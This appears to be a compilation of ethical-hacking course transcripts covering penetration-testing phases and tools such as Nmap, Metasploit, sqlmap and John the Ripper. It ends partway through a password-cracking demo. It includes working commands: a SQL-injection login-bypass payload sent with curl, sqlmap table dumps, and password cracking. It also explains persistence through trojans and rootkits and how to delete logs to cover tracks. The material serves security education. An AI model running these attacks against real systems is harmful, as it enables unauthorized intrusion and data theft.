The first step is getting comfortable with Linux. There are operating systems catered specifically to ethical hackers, like Kali Linux and Parrot Security. Both are Linux derivatives and have a plethora of tools to make your hacking workflow easy and relatively stress-free. The better versed you are with Linux and its terminal, the quicker you can achieve things when hacking.

The next step would be to master the mother of all programming languages, the C programming language. Since Linux and a lot of backend code are written in C, having a strong hand in this language is very important. It's always helpful to learn a couple more relevant languages like Python or JavaScript, which will help you dissect giant pieces of server code like butter.

Remaining anonymous is vital in the hacking sphere, since giving a malicious actor news of your existence on a target network can cause him to flee, or to attack your device instead. The usage of MAC address randomizers and proxy chains is highly beneficial and recommended when monitoring networks for criminal activity; a minimal sketch of both follows.
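Here is a minimal sketch of what those two anonymity aids look like in practice on a Kali-style system. This assumes the macchanger and proxychains4 packages are installed and that the interface is named wlan0; both are assumptions, so adjust to your own setup:

```bash
# Randomize the MAC address of a network interface (interface name is an
# assumption; check yours with `ip link`).
sudo ip link set wlan0 down
sudo macchanger -r wlan0        # -r assigns a fully random MAC
sudo ip link set wlan0 up

# Route a tool's traffic through the proxy list defined in
# /etc/proxychains4.conf, so the target sees the last proxy's IP.
proxychains4 curl -s https://ifconfig.me
```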
And speaking of proxies, ethical hackers must understand networking fundamentals and exactly how networks are established. Learning about various networks and protocols might help you exploit flaws. An ethical hacker with an extensive understanding of networking tools such as Wireshark, Nmap, and others can get through field incidents relatively unscathed.

The fifth skill on our list is traversing the dark web using the famous Tor browser. Much of the internet is hidden behind the Tor network, and getting a closer look at the people who are often at the forefront of the hacking industry can help you familiarize yourself with a certain domain's secrets while keeping you updated with the latest happenings in the cyber crime world.

A major advantage that can tip the scales in favor of an ethical hacker is knowledge of cryptography, or encryption. Encryption is used in various elements of information security, including authentication, data integrity, anonymity, and others. Passwords and other sensitive information are always encrypted on a network, and a hacker must understand how to recognize and break these encryption standards.

Exploiting vulnerabilities makes you a better ethical hacker: it keeps you aware of the security measures that are kept in place as industry standards while handing you the most advanced penetration testing tools on the market. Learn how to scan networks and systems for vulnerabilities that might result in a security breach; ethical hackers may also attempt to write exploits against the system in question.

As a final tip, join forums for conversations with other hackers worldwide to trade, share expertise, and collaborate. Discord, Reddit, Telegram, and other platforms all have communities where you can join and collaborate with fellow learners to broaden your learning spectrum.

Now that we understand some basic skills ethical hackers need to excel in this domain, let us look at the roadmap one can follow to get started. Many ethical hackers begin their careers by studying computer science. You can also acquire an A+ certification from CompTIA by appearing for and passing two additional tests; these tests assess an individual's understanding of PC components and their ability to disassemble and reassemble a PC.

However, before advancing in your profession, you must gather experience and obtain a Network+ or a CCNA certification. The Network+ certification certifies fundamental network expertise such as network administration, maintenance, deployment, and troubleshooting. The CCNA certification guarantees the same skills and strives for foundation-level proficiency.

Once qualified, you can advance to the next level of your career in network support. You'll be responsible for monitoring and upgrading systems, installing security software, and testing for vulnerabilities. You'll obtain expertise in network security, and your goal should be to be offered a position as a network engineer. As a network engineer, you will build and plan networks rather than simply maintain them. Your focus should now shift to the security part of your journey to becoming an ethical hacker. This is the time to focus on earning security certifications such as Security+ or CISSP. The US Department of Defense has approved the Security+ qualification, which covers testing on critical areas such as access control, identity authentication, and cryptography. The CISSP certification is a globally recognized security qualification that validates expertise in risk management, cloud technology, and application development.

The next step would be to start working in the information security division. An information security analyst studies system and network security, engages with security breaches, and strives to implement security solutions. For this profession, you should focus on penetration testing to gain hands-on experience with some of the most essential tools of the trade. Getting the Certified Ethical Hacker, or CEH, certification should be your top priority. The training will teach you all you must understand to become a productive ethical hacker; you will be engaged in a hands-on environment where you will be guided through breaking into a network and finding any security flaws. After obtaining this certification, you can begin marketing yourself as a professional ethical hacker.

We have already covered some skills one needs to learn when starting this journey; however, an ethical hacker also has certain roles and responsibilities that must be carried out meticulously. The first of these is threat modeling. Threat modeling is optimizing network security by identifying vulnerabilities and determining countermeasures to avoid or reduce an attack's impact on the system. A threat is a real or projected negative incident jeopardizing the organization's assets, and the role of an ethical hacker is to give a thorough assessment of potentially harmful attacks and their potential consequences.

They can also conduct information security audits, a risk-based evaluation of a company's security. These regular exercises assess security readiness, identify IT system weaknesses, and offer strategies for reducing future attack threats. They also assess how successfully security-related policies are implemented, resulting in a report that includes discovered flaws and appropriate solutions. Ethical hackers must be able to collect data, detect vulnerabilities, and coordinate risks to create clear and unambiguous professional reports; these evaluations are frequently used to justify security asset expenditures.

The market for trained ethical hackers has never been this expansive. According to various surveys, the job outlook for ethical hackers and information security analysts is projected to grow by 33% between 2020 and 2030.
Companies like IBM, Google, and Microsoft are always on the lookout for trained cyber security personnel in this climate of data breaches and security vulnerabilities. We hope this video has cleared some doubts regarding where to start and what to learn during this journey.

When it comes to web app hacking, it generally refers to the exploitation of applications over HTTP, which can be done by manipulating the application via its graphical user interface, by tampering with the uniform resource identifier (URI), or by tampering with HTTP elements directly that are not part of the URI. The hacker can send a link via an email or a chat and may trick the users of a web application into executing actions; in case the attack is on an administrator account, the entire web application can be compromised.

Anyone who uses a computer connected to the internet is susceptible to the threats that computer hackers and online predators pose. These online villains typically use phishing scams, spam email or instant messages, and bogus websites to deliver dangerous malware to your computer and compromise your computer security. Computer hackers can also try to access your computer and private information directly if you're not protected by a firewall; they can monitor your conversations or peruse the back end of your personal website. Usually disguised with a bogus identity, predators can lure you into revealing sensitive personal and financial information.

A web server can refer to the hardware (the computer) or the software that helps deliver content accessible through the internet. The primary function of a web server is to deliver web pages on request to clients using the Hypertext Transfer Protocol (HTTP). Hackers attack the web server to steal credentials, passwords, and business information by using different types of attacks like DoS attacks, SYN flooding, ping floods, port scans, and social engineering attacks. And in the area of web security, despite strong encryption on the browser-server channel, web users still have no assurance about what happens at the other end.

Although wireless networks offer great flexibility, they have their own security problems. A hacker can sniff the network packets without having to be in the same building where the network is located: as wireless networks communicate through radio waves, a hacker can easily sniff the network from a nearby location. Most attackers use network sniffing to find the SSID and hack a wireless network. An attacker can attack a network from a distance, and therefore it is sometimes difficult to collect evidence against the main hacker.

Social engineering is the art of manipulating users of a computing system into revealing confidential information, which can later be used to gain unauthorized access to a computer system. The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted-access buildings, or getting users to install backdoor software. Knowing the tricks used by hackers to dupe users into releasing vital login information is fundamental in protecting computer systems.

Coming to our main focus for today, let us have a look at the top five most essential ethical hacking tools to be used in 2021.
At the top of the chain lies Nmap. Nmap, which stands for Network Mapper, is a free and open-source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It is most beneficial in the early stages of ethical hacking, where a hacker must figure out the possible entry points to a system before running the necessary exploits, thus allowing the hacker to leverage any insecure openings and breach the device. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services they are running, what operating systems are installed, what types of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but it works fine against single hosts as well. Since every application that connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms that leads to a thorough breach of the system and, ultimately, a fully hacked device.
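A minimal sketch of the kinds of scans described here, using a placeholder address (only scan hosts you are authorized to test):

```bash
# Service and version detection on one host (-sV), plus OS fingerprinting (-O)
sudo nmap -sV -O 192.168.1.10

# Scan all 65535 TCP ports instead of the default top 1000, faster (-T4)
sudo nmap -p- -T4 192.168.1.10
```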
Next on our list we have Metasploit. The Metasploit Framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systematic vulnerabilities on both networks and servers. Because it's an open-source framework, it can be easily customized and used with most operating systems. With Metasploit, the ethical hacking team can use ready-made or custom code and introduce it into a network to probe for weak spots, as another flavor of threat hunting. Once the flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Once a particular vulnerability is identified and the necessary exploit is fed into the system, there are a host of options for the hacker: depending on the vulnerability, hackers can even run root commands from the terminal, allowing complete control over the activities of the compromised system as well as all the personal data stored on the device. A big advantage of Metasploit is the ability to run full-fledged scans on the target system, which gives a detailed picture of the security index of the system along with the exploits that can be used to bypass the antivirus software. Having a single solution that gathers almost all the necessary points of attack is very useful for ethical hackers and penetration testers, as denoted by its high rank in this list.

Moving on, we have the Acunetix framework. Acunetix is an end-to-end web security scanner which offers a 360-degree view of an organization's security. It is an application security testing tool that helps companies address vulnerabilities across all their critical web assets. The need to test applications in more depth than traditional vulnerability management tools allow has created a market with several players in the application security space. Acunetix can detect over 7,000 vulnerabilities, including SQL injections, cross-site scripting, misconfigurations, weak passwords, exposed databases, and other out-of-band vulnerabilities. It can scan all pages, web apps, and complex web applications running HTML5 and JavaScript, and it also lets you scan complex multi-level forms and even password-protected areas of a site. Acunetix is a dynamic application security testing (DAST) package, which has definite perks over static application security testing frameworks, also known as SAST scanners. SAST tools only work during development, only for specific languages, and have a history of reporting a lot of false positives, whereas dynamic testing tools can streamline testing from development to deployment with minimal issues.

Next on our list we have Airgeddon. This is a multi-use bash script for Linux systems used to hack and audit wireless networks like our everyday Wi-Fi routers and their counterparts, along with being able to launch denial-of-service attacks on compromised networks. This multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods of Wi-Fi hacking, including WPS hacking modes, WEP attacks, handshake captures, evil twin attacks, and much more. It usually needs an external network adapter that supports monitor mode, which is necessary to capture the wireless traffic that traverses the air channels. Thanks to its open-source nature, Airgeddon can be used with multiple community plugins and add-ons, thereby increasing its effectiveness against a wide variety of routers in both the 2.4 GHz and 5 GHz bands.

Finally, at number five, we have John the Ripper. John the Ripper is an open-source password security auditing and password recovery tool which is available for many operating systems. John the Ripper Jumbo supports hundreds of hash and cipher types, including those used for user passwords on operating systems, web apps, database servers, encrypted keys, and document files. Some of the key features of the tool include offering multiple modes to speed up password cracking, automatically detecting the hashing algorithm used by the passwords, and ease of running and configuring the tool. It can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources, and the wordlist used in these dictionary attacks can be supplied by the user, allowing for a completely customizable process.
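A minimal sketch of the two modes just described, assuming a John (Jumbo) install, a hashes.txt file you are authorized to audit, and the wordlist path as shipped on Kali (all three are assumptions):

```bash
# Dictionary attack: try every candidate password in a wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Incremental (brute-force) mode: try character combinations exhaustively
john --incremental hashes.txt

# Show any passwords cracked so far
john --show hashes.txt
```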
We also have a few honorary mentions that just missed the cut. Netsparker, for instance, is an automated yet fully configurable web application security scanner that enables you to scan websites, web applications, and web services. Its scanning technology is designed to help you secure web applications easily, without any fuss, so you can focus on fixing the reported vulnerabilities. Burp Suite Professional is one of the most popular penetration testing and vulnerability finding tools and is used for checking web application security; Burp, as it is commonly known, is a proxy-based tool used to evaluate the security of web-based applications and to do hands-on testing. Moving away from websites and applications, Wireshark is a free and open-source packet analyzer which was launched in 2006. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Wireshark captures network traffic on the local network and stores the data for offline analysis; it can capture traffic from Ethernet, Bluetooth, wireless networks, and frame relay connections.

Now that we have learned about the different types of tools that can be used when conducting an ethical hacking audit, let's learn about some potential benefits of such campaigns and why organizations prefer to pay for such audits. Being able to identify defects from an attacker's perspective is game-changing, since it displays all the potential avenues of a possible hack. As a defensive specialist, one can only prepare for the known vulnerabilities, but proactively trying to breach a network or device can make hackers think of techniques that no defense contractor can account for. This kind of unpredictability goes a long way in securing a network against malicious actors.

Another advantage of hiring ethical hackers is the ability to preemptively fix possible weak points in a company's network infrastructure. As seen on many occasions, a real breach will cause loss of data and irreparable damage to the foundation of an organization; being able to gauge such shortcomings before they become public and exploitable is a benefit most organizations make use of. This is not to imply that such security audits are only beneficial to the organization paying for them. When coming across companies that provide certain services, a reliable third-party security audit goes a long way in instilling trust and confidence in their craft. If the ethical hackers cannot find any major vulnerabilities that can be leveraged by hackers, it accentuates the technical brilliance of the organization and its engineers, thereby increasing the clientele by a substantial amount.

In this session we are going to discuss ethical hacking and penetration testing. We're going to talk about the concepts of what constitutes an ethical hack and what a penetration test is, the different types of penetration tests and how they can be done, and an operating system called Kali Linux, its usage, and its importance in cyber security. We will also be discussing the different phases of a penetration test and how hackers utilize these phases to gain their objectives, in what areas we can do a penetration test and how to do those tests, and quite a few of the penetration testing tools available in the Kali Linux space. Then we'll look at a couple of demos at the end of the session to understand how these tools and the operating system can be utilized for various hacks.

So let's start with what is ethical hacking. Plainly defined, ethical hacking is locating weaknesses and vulnerabilities of computers and information systems using the intent and actions of a malicious hacker. The major difference here is that we are hired to discover those weaknesses in a legal and ethical manner. First and foremost, our intent should not be malicious: we do not wish any harm to the organization, and whatever we discover is reported back and not misused. Once we report back, we would also try to help them mitigate or remove those weaknesses or vulnerabilities to enhance the company's security posture. So essentially we would have the same training and the same knowledge as a malicious hacker, except that the intent is different: the intent is to help the organization achieve security, to protect themselves against malicious hackers. The second most important thing about ethical hacking is that we are authorized to do the activity. I cannot in good faith hack somebody and then tell them, you know what, I just wanted to help you out, here are your vulnerabilities and this is the way you can prevent them; I first need authorization from the other party, and only then can I perform an ethical hack.

So in this example, a hacker attacks an individual with malicious intent and misuses whatever information they have gotten: they steal the data, maybe fry the operating system or destroy the hardware, and thus leave the victim without a device. With authorization, an ethical hacker can attack the same individual, minus the destruction of course, and the intent is good: they are willingly finding out the vulnerabilities and helping the victim plug them, so that they would not be a victim of a malicious attack.
Here, the first thing is authorization from the victim, and the second thing is the good intent, where we do not misuse those vulnerabilities: we report them back to the victim or the client and help them patch those vulnerabilities. That's the main difference between a white hat and a black hat; security experts are normally termed white hat hackers, while malicious hackers are termed black hats.

Now, the responsibilities of an ethical hacker are manifold. First and foremost, you have to create scripts and test for vulnerabilities. You first have to identify those vulnerabilities in the first place, so there's a vulnerability assessment, and then you test them to see the validity and the complexity of those vulnerabilities. One of your responsibilities would also be to develop tools to increase security, or to configure security in such a way that it would be difficult to breach.

Another responsibility is performing risk assessments. Now, what is a risk? A risk is a threat posed to an organization by the possibility of getting hacked. Let's say I, as an ethical hacker, run a vulnerability scanner on a particular client and identify 10 different vulnerabilities. Within those 10 vulnerabilities, I do a risk assessment to identify which vulnerability is critical, which would have the most impact on the client, and what the repercussions would be if those vulnerabilities actually got exploited. So in a risk assessment, I'm trying to find out: if the client gets hacked through the identified vulnerabilities, what is the loss they would face? The loss could not only be loss of data; it could be financial losses, loss of reputation, penalties they have to pay to their clients for breaches, or penalties they may have to pay to governments in case of breaches that couldn't be controlled.

Another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data, and finally, to train the staff in network security. We have a lot of employees in an organization, and we need to train the staff on what is allowed and what is not allowed, and on how to keep themselves secure so that they don't get compromised, thus becoming a vulnerability themselves. The policies we have talked about are administrative policies to govern the employees of the organization. For example, password policies: most organizations will have a strict password policy, where you have to create a password that meets a certain level of complexity before it can be accepted, and until you create such a password you're not allowed to log in or register.

So let's move on to understand what penetration testing is. Before penetration testing, there is a phase called vulnerability assessment. A vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization. Once you have identified the list of those vulnerabilities, you then move on to the penetration test. This is the part of ethical hacking that focuses specifically on penetrating the information systems. You have identified a flaw; maybe it's a database with a SQL injection, or a buffer overrun flaw, or a simple password cracking opportunity. Your idea is to create those tools, create those attacks, and try to penetrate into those areas where security is weak.
The essence of penetration testing is to penetrate information systems using various attacks. The attacks could be anything: a phishing attack, a password cracking attack, a denial-of-service attack, or an attack against any other vulnerabilities identified during the vulnerability scan.

So what is Kali Linux, and why is it used? Kali Linux is an operating system often used by hackers and ethical hackers alike because of the tool sets it contains. It is an operating system created by professionals, with a lot of embedded tools. It is a Debian-based operating system with advanced penetration testing and security auditing features; there are more than 600-odd tools in the operating system that can help you leverage attacks such as man-in-the-middle attacks, sniffing, and password cracking. You just need to know how to utilize the operating system and its tools. As mentioned, it contains hundreds of tools used for various information security tasks like computer forensics, reverse engineering, information gathering, even getting access to different machines and creating viruses and worms. There are periodic updates to the operating system as well. It is open source, which means it is free to use; you can even have the source code and modify it if you want. Customizations are available for all the tools, you can download and install third-party tools, there is wide support for wireless network cards, multiple languages are supported at the same time, and you can create a lot of attack scripts and tools and write your own exploits on Kali Linux. All in all, this helps you create a very robust system where you could build your own attacks and launch them against unsuspecting victims. Now, that would be illegal; as far as ethical hacking is concerned, once you have authorization, you identify which tools are to be utilized, you get the appropriate permissions, and only then do you attempt those attacks.

Let's talk about the phases of penetration testing. There are five different phases. The first one is the reconnaissance phase, also known as the information gathering phase. This is the most important phase for any hacker. This is where the hacker, or the ethical hacker if you will, gathers as much information as possible about the target, the victim. Once you have that information, you can identify what tool sets to use and how to attack the victim. For example, you want to find out the IP addresses, the domains and subdomains, the network architecture being utilized, the operating systems in use, the network IP ranges, and so on. You might want to identify employees within an organization for future social engineering attacks: email addresses, telephone numbers, anything and everything that helps you validate and learn about the target is something you want to collect in the reconnaissance phase. At this point in time we are not going to question whether the information we are getting is useful or not; only time will tell, depending on the various attacks we build later on. A few typical information-gathering commands are sketched below.
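A minimal sketch of reconnaissance from a terminal, using example.com and a placeholder IP as stand-in targets (assumptions for illustration; these standard utilities ship with most Linux distributions):

```bash
# Domain registration details: registrar, contacts, name servers
whois example.com

# DNS lookups: IPv4 addresses, mail servers, and name servers
dig +short example.com A
dig +short example.com MX
dig +short example.com NS

# Reverse lookup on a discovered address (placeholder IP)
host 93.184.216.34
```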
This becomes your baseline, your database with all the information about the victim, so that you can come back from later stages to the reconnaissance phase, look at the information you have gathered, and fine-tune your attacks.

Once you have done that, you start the scanning phase. Based on the information you have gathered, you identify live machines within a network. Once you have identified the live machines, you scan them for open ports, protocols, and any processes that are running, and then you identify vulnerabilities within those processes and open ports. Why do we need to find live machines in the scanning phase? Because we want to find the machines that have booted up, have an operating system, and are running on the network. If a machine is not available on the network or is shut down, that machine cannot be hacked through a technical attack; it would take a physical attack, where you physically go to the machine and do whatever you want with it. For a technical attack, you have to identify the machines that have booted up. Then you scan the open ports, because those will be our entry points, and on each port there will be a service running, so you scan the service as well, identify the version of the service, and then do a vulnerability scan to identify whether there are any vulnerabilities in those running services. Based on all of this information, we develop our attacks as we go.

Once we have this, we move on to the gaining access phase, where we attack and try to get access to our victim's machines. It could be a social engineering attack based on the information gathering we have done. On the technical side, if we have identified a vulnerability in the scanning phase, we identify a relevant exploit and use it to try to gain access, or we might craft a trojan and try to execute it on the victim's machine to check whether we can get access that way. It could even be a simple password cracking attack that we have been able to accomplish: we have cracked the password of the person, and now we have gained access to that person's computer. But these attacks would be temporary. For example, if we have cracked a password and the person changes their password every 30 days, after that period our attack would be useless. If a trojan is executed, we get a connection to that machine once, but how do we get a repeated connection over and over again if we want to reconnect?

That's where the maintaining access phase comes in, where we install rootkits, keyloggers, sniffers, and the like, through which we can get a backdoor entry to the victim's machine. If we have already successfully installed a trojan, we would want to add the trojan to the startup menu, so that every time the operating system starts, the trojan gets executed automatically and we maintain the backdoor entry to that victim's machine.

All of these activities are going to leave traces on the victim's machine. If you install a trojan, the trojan, being an application, will create directories and files; a virus would be destructive in nature; if you execute a script, it will leave some logs behind; and even if we log in using the cracked password, it will create a login entry for that particular timestamp, along with the IP address that we used.
In covering tracks, we are essentially trying to avoid detection by deleting the traces of our activity. That means we need to identify where logs have been stored, address those logs, and delete or modify them in such a way that our activity is not traceable.

So these are the five main phases of a penetration test: gather as much information as you can; scan for machines, ports, protocols, and services running on the victim's devices; try to gain access through password cracking, trojans, or exploits for the vulnerabilities, if any; maintain that access by installing further software which gives you backdoor access to that particular system; and then cover your tracks by deleting all traces of your activity. Once successful, the victim will have no idea, you have a backdoor entry, and you can monitor the victim to the extent that you want.

Now, from an ethical hacker's perspective, this penetration test can be done in multiple ways. Again, understand that we are doing an authorized activity: we have identified the tools to use, identified the attacks, gotten the appropriate authorization, and based on that authorization we are conducting a penetration test. The penetration test may be requested in one of the following manners.

First is the black box test. The black box test is where no information about the IT infrastructure is given to the ethical hacker, so they have no idea what it is. They start right from the first phase, information gathering, gather as much information as they can, and based on the gathered information they try to create and launch attacks to see whether they will be successful. Not only does this test the knowledge of the penetration tester, it also tests the security implementations the organization has put in place, to see whether they can identify the attack and prevent it in the first place. This is the simulation of a malicious hacker scenario, where a malicious hacker, having no idea about the organization, first tries to gather information and then tries to attack: no source code knowledge, no technological knowledge, nothing. They just gather information, scan the devices, and then try to gain access.

The second test is a gray box test, where some information or some knowledge of the IT infrastructure is given. Think of it from an employee's perspective: a regular employee in an organization who doesn't have extra privileges like an administrator, but who has limited access within the organization and, based on that, some knowledge of the IT infrastructure. This is a simulation of an insider attack, where a regular user may try to misuse the access they've been given to gather information or gain access to other devices they are not authorized for.

The third test is white box, where full knowledge of the IT infrastructure is given. This is again a simulation of an insider attack, a malicious insider if you will, but at this point the person has complete knowledge of the infrastructure, could be in an administrative position, and is trying to leverage that access to see whether they can get at information or compromise any of the data.

So, to recap, the three tests would be: the first one, black box, where we are simulating an external threat, a hacker sitting outside the organization trying to gain access; the
gray box, an insider threat where a regular employee is trying to get access to infrastructure that they are not authorized for; and the third, a white box audit, where an administrator who has all the leverage, access, and visibility within the infrastructure tries to misuse that access to see what else they can get beyond what has been authorized to them.

Now let's look at the areas of penetration testing: where all could we do a penetration test, thus compromising the security of the application, the server, or the user? First and foremost, network services. This finds vulnerabilities and weaknesses in the security of the network infrastructure. For example, we have switches, routers, and firewalls in the network. All of these are devices that need configuration; if they have not been correctly configured or correctly secured, they will leave some vulnerabilities behind. If we as ethical hackers are able to identify these flaws, these misconfigurations, these vulnerabilities, we can try to exploit them and gain access to the network and the devices within it.

Then we have web applications. Web applications are nothing but software developed on, or deployed over, a web server and made available over the internet or an intranet, for example the websites we visit, or web applications like Facebook. If these applications have vulnerabilities within them, we try to attack the web-based applications and thus bypass authentication, get access to the database, or leak information through those applications. If not, we try to attack the client side. The web application is at the server level, hosted by the deployer; the client side is where we as users are using a computer with a browser and interacting with the web application. The browser and the operating system that we are utilizing have their own vulnerabilities, so we identify a client-side vulnerability and exploit it to either hack the client, or piggyback on the client's connection and try to get access to the server. So you could attack the network, the web application, or the client side itself.

Or you could attack wireless networks. This test examines all the wireless devices used in a corporation: most wireless networks will have laptops, smartphones, tablets, and other devices connected to them. If you are able to access any of these devices through the wireless network, it can help you gain access to the other devices on that network as well.

And then social engineering. This is where you attack humans: you trick an employee of a corporation into revealing confidential information, knowingly or unknowingly, with fake mails, fake websites, or malicious emails that you have sent them, which they fail to recognize as malicious and click on, thus getting victimized. Social engineering attacks are often successful because of the gullibility of humans. Empathy, sympathy: humans have emotions, and emotions can be toyed with and taken advantage of if the person is not careful enough. For example, the most common social engineering attack we see is the Nigerian fraud.
We receive an email saying that someone somewhere has died and left a huge estate behind, a few hundred million, and we have been identified as the person through whom they want to transfer the money to a foreign land to save on taxes. What are the chances of that happening on a daily basis? How many princes are there? That's something we do not verify; it's the greed, if you will, of striking it rich quickly that makes us believe these kinds of emails. We have also received emails about lottery tickets that we have won, without ever having bought a lottery ticket. If you haven't bought one, what did you win? But we don't ask these questions; we just get excited about the amount of money we have supposedly won, bet on our luck, and wait to see whether that email will come to fruition or is just another scam. Social engineering attacks are a dime a dozen these days, and we need to be very careful about what we trust on the internet.

Let's look at the penetration testing tools. There are hundreds and thousands of tools out there; most of them have been consolidated, collected together, and hosted on the operating system known as Kali Linux that we talked about earlier. The predecessor to Kali Linux was BackTrack. BackTrack has been discontinued, and Kali Linux has taken its place, containing all the tools that you see on your screen.

Metasploit is one of the favorite penetration testing tools of hackers and ethical hackers; there are a lot of in-built exploits there, and we'll be doing a demo on it at the end of the session. Nmap is the information gathering tool that scans for live devices, open ports, protocols, and services. BeEF is an application testing tool that helps us find exploits within applications. The Nessus vulnerability scanner is a network- and host-based scanner that helps you identify vulnerabilities within such hosts. Wireshark is a network sniffer which allows you to capture network packets and analyze them to see whether there is any information worth capturing within those packets. sqlmap is an automated tool used for SQL injection attacks: you don't even have to craft your own queries for SQL injection, as that is done by the sqlmap tool. You just need to review whatever is possible through the queries that sqlmap creates and, based on the activity you've identified, refine your search parameters to get access to the database. We'll be doing a demo on sqlmap as well; a minimal usage sketch follows.
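A minimal sketch of how sqlmap is typically invoked against a parameter you are authorized to test (the URL and parameter name are placeholders):

```bash
# Test the 'id' GET parameter for SQL injection (--batch accepts defaults)
sqlmap -u "http://192.168.71.132/vuln.php?id=1" --batch

# If injectable, enumerate databases, then dump a table of interest
sqlmap -u "http://192.168.71.132/vuln.php?id=1" --batch --dbs
sqlmap -u "http://192.168.71.132/vuln.php?id=1" --batch -D appdb -T users --dump
```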
And then there is John the Ripper. John the Ripper is a tool used for password cracking: dictionary attacks and brute force attacks are done using John the Ripper. What is a dictionary attack? A dictionary attack is an attack where we create a list of all probable passwords, store them in a text file, and run that list against the password tool to see if any of those passwords match. A brute force attack is the same attack, but trying every permutation and combination of the character set to figure out whether we can crack the password at all. These are just some of the tools; for every tool there are another hundred or more supporting tools. Alongside the Nessus vulnerability scanner, for example, there are alternatives such as the Qualys vulnerability scanner and GFI LanGuard, and lots of other software out there, but these are some of the most commonly utilized tools.

Let's look at the Metasploit attack. Metasploit is a penetration testing framework that makes hacking very simple: you just need to know how to utilize the tool, identify the vulnerability associated with a particular exploit, and then run the exploit in Metasploit. We'll be demoing this during the practical. There are active exploits and passive exploits. An active exploit targets a specific computer, runs until execution, and then exits; it uses brute force and exits when an error occurs. Passive exploits wait for incoming requests and exploit them as soon as they connect; they can also be used in conjunction with emails and web browsers. So with passive exploits, we create a payload, like a reverse connection payload, and send it to the victim. Our machine sits in listen mode, and once that software is executed at the victim's end, the victim's machine initiates a connection back to us and we exploit that particular vulnerability. This is the practical that we'll be doing with Metasploit, so let's move on with the demos.

All right, let's have a look at some of the demos we talked about in the ethical hacking and penetration testing module. We are going to look at three different demos: the first is a SQL injection attack that we'll perform on a practice tool, the second is a password cracking attack on Windows 7, and the third is a Meterpreter-based (Metasploit-based) Shellshock attack on a Linux-based web server. So let's get cracking.

I've powered on this virtual machine, which is the OWASP Broken Web Applications VM. It is a tool provided for people who want to enhance their skills and practice these attacks in a legal manner. We're going to go to this site: I'll open up my browser, the IP address is 192.168.71.132, and that's the OWASP Broken Web Applications page we want to utilize. We're going to head off to Mutillidae II, and we're going to look at a SQL injection attack where we want to bypass authentication.

This takes us to the login screen, so we can just try our luck here and see that the authentication mechanism works: "account does not exist", so the username and password we supplied are not correct. This confirms there's a SQL database behind the form, and we can try to attack it and see whether we can bypass the authentication. What we want to do is create a malformed SQL query that gives us a different output. I'm just going to type a single quote in the login field, and you can see that the quote is suddenly recognized as an operator and an error is given out, compared to the earlier attempt with a proper text-based login, which just told us the account does not exist. The error output even shows us the query we had broken, and it shows us how the SQL works. In the full ethical hacking trainings there are explanations of what these queries are all about and how the syntax works; here we're just going to see if we can craft a malformed query to log in as a user. So I'm going to build the query here and give it a comparison that is always true: a single quote, then or 1=1, followed by a comment sequence (dash dash space). If you now click login, you should be able to bypass authentication, and you can see "user has been authenticated": we now have admin access to this application.
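A minimal sketch of the same bypass sent from the command line with curl. The page path and form field names here are assumptions for illustration; the real Mutillidae form fields may differ:

```bash
# Submit the classic authentication-bypass payload to a login form.
# --data-urlencode handles the quote and spaces in the payload safely.
curl -s 'http://192.168.71.132/mutillidae/index.php?page=login.php' \
     --data-urlencode "username=' or 1=1 -- " \
     --data-urlencode "password=anything"

# If the form is injectable, the WHERE clause effectively becomes:
#   ... WHERE username='' or 1=1 -- ' AND password='...'
# "or 1=1" is always true, and "-- " comments out the password check.
```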
Now, the SQL queries need to be crafted in such a way that they will work in the given context, so there is a lot of exercise in identifying what the database is, whether it's a Microsoft SQL Server database, an Oracle database, and so on, and then choosing the proper commands. Identifying all of that comes with the training; right now we're just looking at a demo of how a SQL injection attack works.

Now let me log out. We were on a login page, where that query worked wonders and allowed us to bypass authentication, but what query is accepted also depends on what kind of page I am on. Application understanding comes into the picture here: knowing which function we are calling when we are connected to a particular page. This next page is a user lookup function. Again, we try the same basic test first; that's not going to work: authentication error, bad username or password. But if we type in the same injection, a single quote, or 1=1, and the comment sequence, here it is not going to log us in, because this is not a login page but a user lookup form. Instead it gives us a dump of all the records it has: you can see all the usernames and passwords stored in the user lookup table coming out. This is where the understanding comes in of which query to create on which page, depending on the function being called. So that's the SQL injection attack we wanted to look at.

Let's move on to password cracking. This is a Windows 7 machine, and I'm going to do a very basic password cracking example. We're just going to log in. Here the assumption is that we are able to log in, we have access to a computer, and we want to check out the other users of this computer and see whether we can find out their passwords, so that we could log in as a different user, steal data if required, and not be blamed if any logs are created. We've got a tool called Cain and Abel installed right here. I'm already an administrator on this machine; I'm checking out other administrators who share the same privileges, or any other user on this system whose password I can crack, so that I could get access through their account and carry out any malicious activity. The tool lets me go into its cracker module and enumerate this machine, identifying all the users and password hashes on it. I'm just going to click on the plus sign and import hashes from the local system. Where are these files stored, where does Windows store its passwords, in what format are they stored, and what does this tool do to retrieve them? That's something we all need to know as ethical hackers. Import the hashes from the local system, click next, and the tool enumerates that file and gives you a list of all the users: you can see the users hacker, admin, test (the one we are logged in as), and a user called virus as well, and you can see the hash value of each password being utilized. There is a particular format in which Windows stores these hash values, and once we have them, if I want to crack a password, there are various attacks we can run, for example a dictionary-based attack or a brute-force attack.
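As an aside, the same kind of Windows NT hashes can also be attacked with John the Ripper, covered earlier; this is a swapped-in alternative to the Cain and Abel workflow in the demo, not what the demo itself uses. A minimal sketch, assuming the dumped hashes are saved to a file and a Jumbo build of John that supports the NT format:

```bash
# Crack Windows NT hashes from a dump file using a wordlist first...
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt ntlm_hashes.txt

# ...then fall back to incremental (brute-force) mode for the rest
john --format=NT --incremental ntlm_hashes.txt
```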
